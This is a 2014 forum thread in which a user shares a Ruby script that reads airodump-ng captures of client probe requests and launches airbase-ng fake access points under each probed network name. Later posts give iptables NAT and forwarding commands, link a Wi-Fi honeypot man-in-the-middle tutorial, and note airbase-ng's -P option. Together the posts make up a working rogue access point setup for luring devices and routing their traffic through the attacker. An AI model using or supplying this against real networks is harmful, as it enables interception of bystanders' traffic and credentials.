i8igmac Posted March 13, 2014 Share Posted March 13, 2014 karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid... #start airodump-ng wlan0 -w airbase # this will simply scan airbase.csv file for client probe @pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco" def refresh_list # read a airodump.csv file and sort threw clients data=File.open("airbase-01.csv","r") block=data.read cut=block.index("\r\n\r\n") block_1=block[146..cut] # here is your list of accespoints... block_2=block[cut+90..-1] # here is your list of clients buff=[] block_2.each_line{|x| buff<< x.split(",")[5..-1]} buff.uniq.each{|x| if not x==nil x.each{|y| if not y.include?(":") if not y.include?("(not associated)") y.map(&:strip).each{|z| if z.size>=1 if not @pid_list.include?(z) Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")} @pid_list<<z end end } end end } end } end refresh_list while true sleep 10 refresh_list end Quote Link to comment Share on other sites More sharing options...
i8igmac Posted March 14, 2014 Author Share Posted March 14, 2014 Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives. Labtop has 2 wifi devices. Wlan1 is connected to droid 4g 192.168.43.130 Wlan0 will be airbase-ng so should I set ifcinfig at0 192.168.44.1 up ? also how would u configure dhcp 192.168.0.100-250??? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted March 16, 2014 Author Share Posted March 16, 2014 (edited) i had to boot up kali to get a working example of a fake ap with dnsmasq... simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html and dont forget to add iptables to complete your clients internet connection wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chainiptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADEiptables --append FORWARD --in-interface at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward Edited March 16, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
phpsystems Posted March 26, 2014 Share Posted March 26, 2014 Cool script, but have you seen airbase-ng's -P option? My understanding is that it would do much the same thing. From the web page (http://www.aircrack-ng.org/doku.php?id=airbase-ng): -P All ProbesThis causes the fake access point to respond to all probes regardless of the ESSIDs specified. Without -P, the old behavior of ignoring probes for non-matching ESSIDs will be used. Also, -C SecondsThe -P option must also be specified in order to use this option. The wildcard ESSIDs will also be beaconed this number of seconds. A good typical value to use is ”-C 60”. When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listens passively for beacons in many cases) which share the same WiFi? network as Linux/Mac OS X clients which send directed probes. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.